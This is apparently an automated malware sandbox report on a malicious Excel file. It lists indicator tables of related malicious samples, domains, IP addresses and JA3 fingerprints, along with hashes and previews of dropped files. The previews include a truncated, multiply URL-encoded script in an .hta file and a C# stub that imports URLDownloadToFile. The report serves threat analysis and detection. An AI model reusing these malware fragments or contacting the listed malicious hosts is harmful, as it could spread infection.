	Comprobante de pago.xlam.xlsx	Get hash	malicious	Unknown	Browse	paste.ee/d/KXy1F
	01YP9Lwum8.exe	Get hash	malicious	DCRat	Browse	77777cm.nyashtyan.in/externalpipejsprocessAuthapiDbtrackWordpressCdn.php
	PO-000041522.exe	Get hash	malicious	FormBook	Browse	www.freedietbuilder.online/nnla/
	http://onlinecheapflights.net/	Get hash	malicious	Unknown	Browse	onlinecheapflights.net/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
qrisni.me	Payment Advice.xls	Get hash	malicious	Lokibot	Browse	188.114.97.3
	Credit_Details2251397102400024.xla.xlsx	Get hash	malicious	Unknown	Browse	188.114.97.3
	Pro_Inv_24102024_payment_confirmations_SWIFTFiles.xls	Get hash	malicious	Unknown	Browse	188.114.97.3
	Credit_Details2251397102400024.xla.xlsx	Get hash	malicious	Unknown	Browse	188.114.97.3
	Pro_Inv_24102024_payment_confirmations_SWIFTFiles.xls	Get hash	malicious	Unknown	Browse	188.114.96.3
	Credit_Details2251397102400024.xla.xlsx	Get hash	malicious	Unknown	Browse	188.114.96.3
	Pro_Inv_24102024_payment_confirmations_SWIFTFiles.xls	Get hash	malicious	Unknown	Browse	188.114.97.3
	PO%20K22012FA[1].docx	Get hash	malicious	Unknown	Browse	188.114.96.3
	#PO247762.docx	Get hash	malicious	Remcos	Browse	188.114.97.3

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AS-COLOCROSSINGUS	Payment Advice.xls	Get hash	malicious	Lokibot	Browse	192.3.176.141
	43655- Urgent - Request for Quotation.exe	Get hash	malicious	Remcos	Browse	192.210.150.35
	la.bot.arm.elf	Get hash	malicious	Unknown	Browse	23.95.194.49
	seethebestthingsevermeetwithgreatthingstobegood.hta	Get hash	malicious	Cobalt Strike	Browse	192.3.176.141
	greatthingswithgoodnewsgivenbygodthingsgreat.hta	Get hash	malicious	Cobalt Strike	Browse	192.3.176.141
	seethebestthingstobegoodwithhislifebestthigns.hta	Get hash	malicious	Cobalt Strike	Browse	192.3.176.141
	la.bot.m68k.elf	Get hash	malicious	Unknown	Browse	107.174.214.206
	la.bot.arm5.elf	Get hash	malicious	Unknown	Browse	172.245.19.71
	la.bot.m68k.elf	Get hash	malicious	Unknown	Browse	104.168.36.51
	Credit_Details2251397102400024.xla.xlsx	Get hash	malicious	Unknown	Browse	192.3.179.174
CLOUDFLARENETUS	__5A1AACAD-4F60-4DC8-94AA-4866010B7794_.bat	Get hash	malicious	Unknown	Browse	104.16.230.132
	Payment Advice.xls	Get hash	malicious	Lokibot	Browse	188.114.96.3
	https://www.google.ca/url?q=nyYhuJkyZc5becm4Aebd&rct=dHYJbECHyHBgmK2d6Hkk&sa=t&esrc=VPIIRnP5TJCWQChPCgwH&source=&cd=TWsylIzvnNqdQKP0bZIw&uact=&url=amp/uniquestarsent.com/ck/bd/BNsT048mrEEHImhtrfrgmcfu/a2Vubml0aC5jYXNlQGFkdmFuY2UtYXV0by5jb20	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	Oct25_2024.htm	Get hash	malicious	Outlook Phishing, HTMLPhisher	Browse	104.17.25.14
	https://accesspage853.ubpages.com/4k5-ffdfg	Get hash	malicious	Unknown	Browse	104.18.41.137
	https://beta.adiance.com/wp-content/plugins/arull.php?7096797967704b5369323074645079557a5054436e4e5379314f7a644d725474524c7a732f564c7a4f4b794d6a574277413dhttps://digidunesen.sa.com/v2Xhk/#X%5Bemail%5D	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	Order Specifications for Materials.docx.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.12.205
	https://link.edgepilot.com/s/8e0e5379/EMW5cxymxkqj1qgquAdAJg?u=https://1drv.ms/o/c/67a50aba8b4bc7df/Es0QkMhT9wJGqs_vzb8xaRQBgzED6dWk5_dCMe34N16rYQ?e=5%253aTtRWoI%26sharingv2=true%26fromShare=true%26at=9&c=E,1,DNZ_Csfpwg3nzWxVo2TSq2LzcEM3C6hdkfA-QbvL5dwYrcj0RsSt_vroZV-UqAThZkP5E_WMmdbQ82a_nveA3iNTPpg_CIcQxQFCbK60ykcRIVrxnkr2VnkbdtuE&typo=1	Get hash	malicious	Unknown	Browse	188.114.96.3
	http://asgardcapitalpartners-sharepoint.com	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	file.exe	Get hash	malicious	NetSupport RAT	Browse	172.67.68.212
NET1-ASBG	Payment Advice.xls	Get hash	malicious	Lokibot	Browse	94.156.177.220
	dw7h7aQwVZ.exe	Get hash	malicious	Lokibot	Browse	94.156.177.220
	1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Get hash	malicious	Lokibot	Browse	94.156.177.220
	SecuriteInfo.com.W97M.DownLoader.6515.29545.30613.xlsx	Get hash	malicious	Lokibot	Browse	94.156.177.220
	sample.bin	Get hash	malicious	Okiru	Browse	93.123.85.166
	Shipping Documents WMLREF115900.xls	Get hash	malicious	Lokibot	Browse	94.156.177.220
	Logs.xls	Get hash	malicious	Lokibot	Browse	94.156.177.220
	SOA October 24_1.doc	Get hash	malicious	Lokibot	Browse	94.156.177.220
	17296631442c81ba7f9716fbc1aab98d3cbe332f196a0c4ba623a6879e4902adfc5aa38233992.dat-decoded.exe	Get hash	malicious	Lokibot	Browse	94.156.177.220
	hZ6ZMDS1rc.exe	Get hash	malicious	AsyncRAT	Browse	93.123.39.76

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
05af1f5ca1b87cc9cc9b25185115607d	Payment Advice.xls	Get hash	malicious	Lokibot	Browse	142.250.186.46 142.250.186.161
	SecuriteInfo.com.W97M.DownLoader.6515.29545.30613.xlsx	Get hash	malicious	Lokibot	Browse	142.250.186.46 142.250.186.161
	REVISED INVOICE.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	142.250.186.46 142.250.186.161
	transferencia interbancaria_66579.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	142.250.186.46 142.250.186.161
	Comprobante de pago.xlam.xlsx	Get hash	malicious	Unknown	Browse	142.250.186.46 142.250.186.161
	Orden de Compra No. 78986756565344657.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	142.250.186.46 142.250.186.161
	Shipping Documents WMLREF115900.xls	Get hash	malicious	Lokibot	Browse	142.250.186.46 142.250.186.161
	A & C Metrology OC 5457144.xls	Get hash	malicious	Unknown	Browse	142.250.186.46 142.250.186.161
	#PO247762.docx	Get hash	malicious	Remcos	Browse	142.250.186.46 142.250.186.161
	PO NAHK22012FA000000.docx	Get hash	malicious	Unknown	Browse	142.250.186.46 142.250.186.161
7dcce5b76c8b17472d024758970a406b	Payment Advice.xls	Get hash	malicious	Lokibot	Browse	188.114.97.3
	Credit_Details2251397102400024.xla.xlsx	Get hash	malicious	Unknown	Browse	188.114.97.3
	Pro_Inv_24102024_payment_confirmations_SWIFTFiles.xls	Get hash	malicious	Unknown	Browse	188.114.97.3
	Credit_Details2251397102400024.xla.xlsx	Get hash	malicious	Unknown	Browse	188.114.97.3
	Pro_Inv_24102024_payment_confirmations_SWIFTFiles.xls	Get hash	malicious	Unknown	Browse	188.114.97.3
	SecuriteInfo.com.Other.Malware-gen.26961.24680.xlsx	Get hash	malicious	Unknown	Browse	188.114.97.3
	SecuriteInfo.com.W97M.DownLoader.6515.29545.30613.xlsx	Get hash	malicious	Lokibot	Browse	188.114.97.3
	SecuriteInfo.com.Other.Malware-gen.26961.24680.xlsx	Get hash	malicious	Unknown	Browse	188.114.97.3
	REVISED INVOICE.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	Shipping Documents WMLREF115900.xls	Get hash	malicious	Lokibot	Browse	188.114.97.3

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	4742
Entropy (8bit):	4.8105940880640246
Encrypted:	false
SSDEEP:	96:mCJ2Woe5Sgyg12jDs+un/iQLEYFjDaeWJ6KGcmXuFRLcU6/KI2k6Lm5emmXIG:Jxoe5+gkjDt4iWN3yBGH+dcU6CIVsm5D
MD5:	278C40A9A3B321CA9147FFBC6BE3A8A8
SHA1:	D795FC7D3249F9D924DC951DA1DB900D02496D73
SHA-256:	4EB0EAE13C3C67789AD8940555F31548A66F5031BF1A804E26EA6E303515259E
SHA-512:	E7222B41A436CE0BF8FA3D8E5EB8249D4D3985419D0F901F535375789F001B5929EF9B85C1D6802F0FBD5F722A52CB27021F87D076E69D92F46C7C3E894C6F00
Malicious:	false
Preview:	PSMODULECACHE.....8.......S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script............7...q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1m.......Remove-Variable........Convert-String........Trace-Command........Sort-Object........Register-Object

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\greatthingswithgoodnewsgivenbygodthingsgreat[1].hta

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	HTML document, ASCII text, with very long lines (65520), with CRLF line terminators
Category:	modified
Size (bytes):	209223
Entropy (8bit):	1.8943912506222536
Encrypted:	false
SSDEEP:	96:Eac75KAtf7aRNeKmo4T5vc1IPqCwFifcu7T:EaA52RNevpJVfZT
MD5:	9DBF5EE2610284F5668FB229BA474B95
SHA1:	12B3F4C93E36B9BCA1BFECF8FA522748D3631C74
SHA-256:	FCC1B8C11B5CAE212CBDB9B7AAA083DA59CCAB319816D7EF8E37C2856347B0F0
SHA-512:	06FE1B0E3CA4E04108FA8A50F60867E42F38E60768AEBBC8935A7C24B973CF3546F6F7F4548E9FAC67CEBE552319D7323FEE5EEAA87DC5F958AA23377CB3CCB2
Malicious:	true
Preview:	<script>.. ..document.write(unescape("%3Cscript%20language%3DJavaScript%3Em%3D%27%253Cscript%2520language%253DJavaScript%253Em%253D%2527%25253Cscript%252520language%25253DJavaScript%25253Em%25253D%252527%2525253Cscript%25252520language%2525253DJavaScript%2525253Em%2525253D%25252527%252525253C%2525252521DOCTYPE%2525252520html%252525253E%252525250A%252525253Cmeta%2525252520http-equiv%252525253D%2525252522X-UA-Compatible%2525252522%2525252520content%252525253D%2525252522IE%252525253DEmulateIE8%2525252522%2525252520%252525253E%252525250A%252525253Chtml%252525253E%252525250A%252525253Cbody%252525253E%252525250A%252525253CSCript%2525252520TYpe%252525253D%2525252522tExt/VbscRiPt%2525252522%252525253E%252525250ADiM%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%25252

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\simplethingswithgreatthignsgivenmebestthings[1].tiff

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	139408
Entropy (8bit):	3.700015256114386
Encrypted:	false
SSDEEP:	3072:5S7Ngt5pSGw2yzrgYvQw7ZweRFdvTtLALWdkj:EgmQowexvxHdkj
MD5:	74339D80989D10693DBC1115D1CF3EB4
SHA1:	BD9B4DEA8D68DB3261E4EB23A9DFE857D0F9EE44
SHA-256:	A73C93345D81B888FE37255ABC545DCDB3470B4F0BD59654E4B398C87BE6B64D
SHA-512:	4BEFE3383549FB2048E9617430B284F8B62CCE46FA4998A62122E7ED4349357AD9B11C0A0819C40467CE3B2CA7648222B1714E3745A4E74F50FAE3D569CAA1BA
Malicious:	false
Preview:	..p.r.i.v.a.t.e. .f.u.n.c.t.i.o.n. .C.r.e.a.t.e.S.e.s.s.i.o.n.(.w.s.m.a.n.,. .c.o.n.S.t.r.,. .o.p.t.D.i.c.,. .e.s.t.i.c.a.)..... . . . .d.i.m. .g.r.a.f.i.t.a.r.F.l.a.g.s..... . . . .d.i.m. .c.o.n.O.p.t. ..... . . . .d.i.m. .g.r.a.f.i.t.a.r..... . . . .d.i.m. .a.u.t.h.V.a.l..... . . . .d.i.m. .e.n.c.o.d.i.n.g.V.a.l..... . . . .d.i.m. .e.n.c.r.y.p.t.V.a.l..... . . . .d.i.m. .p.w..... . . . .d.i.m. .t.o.u.t..... . . . .'. .p.r.o.x.y. .i.n.f.o.r.m.a.t.i.o.n..... . . . .d.i.m. .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e..... . . . .d.i.m. .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e.V.a.l..... . . . .d.i.m. .p.r.o.x.y.A.u.t.h.e.n.t.i.c.a.t.i.o.n.M.e.c.h.a.n.i.s.m..... . . . .d.i.m. .p.r.o.x.y.A.u.t.h.e.n.t.i.c.a.t.i.o.n.M.e.c.h.a.n.i.s.m.V.a.l..... . . . .d.i.m. .p.r.o.x.y.U.s.e.r.n.a.m.e..... . . . .d.i.m. .p.r.o.x.y.P.a.s.s.w.o.r.d..... . . . . ..... . . . .g.r.a.f.i.t.a.r.F.l.a.g.s. .=. .0..... . . . .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e. .=. .0..... . . . .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e.V.a.l. .=. .0..... . . . .p.r.o.x.

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\simplethingswithgreatthignsgivenmebestthings[2].tiff

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	11033
Entropy (8bit):	3.4265352840021697
Encrypted:	false
SSDEEP:	96:W/NdIKC38rVgjaXrEhiJhi7xvToXthi7Xnhi5ThiDQkLhixfmhixa51hiE50hiZL:W/YQK5kW0ksxftxaMEdZ+2KwxD
MD5:	EDD77BF7C54A120D0A006B008A70B384
SHA1:	083AD6B0BC110DD622B29B292138EE1288462FB4
SHA-256:	B8DEBCF9D5828DD27713B6DA37B31A695DC8282CA6D2B93CA99728D52E82D5D9
SHA-512:	DA4E3852D1630101ED0FB98043B74BFB4AAD83FEA0948E0C603E4169A862B9970232A2ABD3DDE882FA10CEB7642464DA8DD79FE84D0C51B485752E924287C912
Malicious:	false
Preview:	..p.r.i.v.a.t.e. .f.u.n.c.t.i.o.n. .C.r.e.a.t.e.S.e.s.s.i.o.n.(.w.s.m.a.n.,. .c.o.n.S.t.r.,. .o.p.t.D.i.c.,. .e.s.t.i.c.a.)..... . . . .d.i.m. .g.r.a.f.i.t.a.r.F.l.a.g.s..... . . . .d.i.m. .c.o.n.O.p.t. ..... . . . .d.i.m. .g.r.a.f.i.t.a.r..... . . . .d.i.m. .a.u.t.h.V.a.l..... . . . .d.i.m. .e.n.c.o.d.i.n.g.V.a.l..... . . . .d.i.m. .e.n.c.r.y.p.t.V.a.l..... . . . .d.i.m. .p.w..... . . . .d.i.m. .t.o.u.t..... . . . .'. .p.r.o.x.y. .i.n.f.o.r.m.a.t.i.o.n..... . . . .d.i.m. .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e..... . . . .d.i.m. .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e.V.a.l..... . . . .d.i.m. .p.r.o.x.y.A.u.t.h.e.n.t.i.c.a.t.i.o.n.M.e.c.h.a.n.i.s.m..... . . . .d.i.m. .p.r.o.x.y.A.u.t.h.e.n.t.i.c.a.t.i.o.n.M.e.c.h.a.n.i.s.m.V.a.l..... . . . .d.i.m. .p.r.o.x.y.U.s.e.r.n.a.m.e..... . . . .d.i.m. .p.r.o.x.y.P.a.s.s.w.o.r.d..... . . . . ..... . . . .g.r.a.f.i.t.a.r.F.l.a.g.s. .=. .0..... . . . .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e. .=. .0..... . . . .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e.V.a.l. .=. .0..... . . . .p.r.o.x.

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\655DB7B3.emf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	38272
Entropy (8bit):	2.8081661079517968
Encrypted:	false
SSDEEP:	192:6/CJoV9KjGhFi1lildmP/4GtXULs9h2QmlC+a6gz5nCf5OBgJP+SKA:6/CbiG1l34GtXl2QmlC+a6gz5SOyJ1/
MD5:	1ED1E7A0ED6137C48652115CA579221E
SHA1:	B66C7110A3831166B32E3664AAF24AB75C0CCCA1
SHA-256:	A694409B40BB7B2DFC78BE6C7ECDFC4F6A8B95305247EB520C57F9E0B1BBFDC3
SHA-512:	93D917CEAD84FF6792723B2238A342F995A3AF8DD0003DA8298BB04F5A6D53F0C6EC7728D6EE51933BEBA015969EAD8C25F8566E6DC2CEE4EBF931F2422F25AE
Malicious:	false
Preview:	....l...........c................N...@.. EMF........l.......................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................d......."...........!...............................................d......."...........!...............................................d......."...........!...............................................d......."...........!...............................................d.......'.......................%...........................................................L...d...........c...............d.......!..............?...........?................................R...p.................................. C.a.l.i.b.r.i...........................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6D6EA618.emf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	349384
Entropy (8bit):	3.7170605169628734
Encrypted:	false
SSDEEP:	1536:6dkVZD+Jb5qGYJ6OoG+RJ2dB9eJb85eKJBFgcxSoigiP/l5K:UkVZD+JbBYJhkRJiTeJI8KJcs/ibY
MD5:	4491EFDD2921740B529E96BD780D0644
SHA1:	A170615106A550A873E2FD78D913FA02264B1D19
SHA-256:	2873A34503AFAFA73B48AB4C63CB00D14D209C24A704F6BBE92D5D9EA40BE538
SHA-512:	FEFE0B18BD15EB774F42056EB9E39FD8BFF8DDEF76595E5EFEC9A76117D173513FFCFCF79A45ACDECD4F714DBC6E95EDB813AF610F19C96E1595D72DC7FDE707
Malicious:	false
Preview:	....l...........'....................S.. EMF.....T..S.......................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................(......."...........!...............................................(......."...........!...............................................(......."...........!...............................................(......."...........!...............................................(.......'.......................%...........................................................L...d...........=...............<.......!..............?...........?................................'......................%...........(......................L...d...........F...............G...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7F15ABE6.emf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	1462180
Entropy (8bit):	4.432116325040296
Encrypted:	false
SSDEEP:	6144:rQelSzQ4mD3f5ReZdZJElOFmxi9DrvwdkfDxdYJhvRJiTeJ78KJcj/iiDmdYJhkG:rVlS5mzCJEuPukZBV
MD5:	C88BBA4F839966D6648736A889FC1572
SHA1:	6BC7FD238EB8563236B3E0049CFA9849DFC7A71B
SHA-256:	49497513E15B13BD704C26CBE555D5F0A68F77203C59E500025BBC719366296D
SHA-512:	0149FB22DD6E3530EEE015A978E4D99C6DBE6FE70C508C6CCFF735B875B0DE97B06BD9878C9E871A3EFBF2429640329A9CD80DE790CB80CB8364700333D5A571
Malicious:	false
Preview:	....l...............2...........@m..?... EMF.....O...,..A...................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3...'.......................%...........................................................L...d...v.../......._...v.../.......1...!..............?...........?................................L...d...................................!..............?...........?............................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\90038BFA.emf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	172076
Entropy (8bit):	3.1342558498505824
Encrypted:	false
SSDEEP:	1536:7DqEuvAIid/aQGb1BfUErpxTORWEl+tIL22EZCd:iEuWd/adDrvTUP22Bd
MD5:	D85DAC1376E45C58F790BD50C2729F6C
SHA1:	5BD339C54A944689935652E4A1CC78961EB19589
SHA-256:	CE5CF5334F2BF26B0B3F4B135B2BEA9126CB29DD1C5BED1F558FAA2BFE4C8E48
SHA-512:	6B864B3E47331C5C37376B1F9ED7FE1F8D48BE27438DE9C4D7BA3B3ED6ED3F319425E8D696B51C7969AD3C10A7285D7212E59FDDAC8385BCD992A03EF189789A
Malicious:	false
Preview:	....l..............................eQ.. EMF....,.......$...................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...........................................................L...d...........T...)..............."...!..............?...........?................................'.......................%...................................&...........................%.......

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\92B84E9D.emf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	52712
Entropy (8bit):	2.69601862257325
Encrypted:	false
SSDEEP:	384:k37ZSy7s8wsI459Fwh+zRrXheOV8OV8OV1lJ//Te7rP:y7blMOV93WrP
MD5:	57851611F066C7BD325A4B9817DD28B0
SHA1:	A52AE733137921018D9670ABB919568CD5F90F2F
SHA-256:	EE958A9DEF0CA8010229635A73E8F3621A234CAEE58EE7C6DF8CFE128490B139
SHA-512:	A6B5D475F1247988B9139F2586D210FF0741203B398F7FB2CF8CB1C7C39250C52982954F81F576FF765E2561A3462078A173EA35749C1DDEF55FC99BD4918C85
Malicious:	false
Preview:	....l............................S...".. EMF................................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.................P.....%.....................P.....................................L...d.......<.......m.......<.......2...!..............?...........?................................R...p.................................. C.a.l.i.b.r.i...........................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D35A1E0C.emf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	1462180
Entropy (8bit):	4.432116325040296
Encrypted:	false
SSDEEP:	6144:rQelSzQ4mD3f5ReZdZJElOFmxi9DrvwdkfDxdYJhvRJiTeJ78KJcj/iiDmdYJhkG:rVlS5mzCJEuPukZBV
MD5:	C88BBA4F839966D6648736A889FC1572
SHA1:	6BC7FD238EB8563236B3E0049CFA9849DFC7A71B
SHA-256:	49497513E15B13BD704C26CBE555D5F0A68F77203C59E500025BBC719366296D
SHA-512:	0149FB22DD6E3530EEE015A978E4D99C6DBE6FE70C508C6CCFF735B875B0DE97B06BD9878C9E871A3EFBF2429640329A9CD80DE790CB80CB8364700333D5A571
Malicious:	false
Preview:	....l...............2...........@m..?... EMF.....O...,..A...................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3...'.......................%...........................................................L...d...v.../......._...v.../.......1...!..............?...........?................................L...d...................................!..............?...........?............................

C:\Users\user\AppData\Local\Temp\1f4gqch3.yb0.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\1xjhsaca.ejy.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\3w1sxmqs\3w1sxmqs.0.cs

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (357)
Category:	dropped
Size (bytes):	480
Entropy (8bit):	3.9787141625870177
Encrypted:	false
SSDEEP:	6:V/DsYLDS81zuH0qiwPMmHnQXReKJ8SRHy4HOCluVmmZOe/o2Iy:V/DTLDfuH05tXfH6ysXIy
MD5:	CE22E90871744B25A04AC8C5691F49CC
SHA1:	BC0A93C1FE61E00DAA34774994B638D19F735228
SHA-256:	3B955E3C74519870AACEF3876B7CDC4420F0B77D2D09937B7385E8B578F26546
SHA-512:	5F13AF44F2219D050D04658808B287BCB9C948765A1ACA148AB148E0981087AB22D6B5AF9FA74360B41A7322B9009858CF25E480A579B16FC8BD62C9B72D0F88
Malicious:	false
Preview:	.using System;.using System.Runtime.InteropServices;..namespace DZVrARMdWah.{. public class UbTbpiKe. {. [DllImport("UrlmON", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr btGlUjs,string cDSFYG,string eDacYyTYYCQ,uint BkZoE,IntPtr AjQtbauHqbT);.. }..}.

C:\Users\user\AppData\Local\Temp\3w1sxmqs\3w1sxmqs.cmdline

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
Category:	dropped
Size (bytes):	369
Entropy (8bit):	5.26201805037218
Encrypted:	false
SSDEEP:	6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2P23f/Gzxs7+AEszIP23f/V9:p37Lvkmb6KzWWZEoF9
MD5:	C73B5CD9DFBF369622CE6CF79504A470
SHA1:	3D1C03A3C72A637FF3F36AF3778BB911D6A41F54
SHA-256:	86F81F29B7BB222838AB0C29BF480D3F95F3781F3271A81DAC7BBB78F3BDE8F7
SHA-512:	3C4373A777DB81D800E908696B90BEE5EAD097762C088B77D9F250A10F2E6FD42D139C29329F7F2643F505C47D817C86A1A2F0FA58C526FF18ED0920AF62BA1D
Malicious:	false
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\3w1sxmqs\3w1sxmqs.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\3w1sxmqs\3w1sxmqs.0.cs"

C:\Users\user\AppData\Local\Temp\3w1sxmqs\3w1sxmqs.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
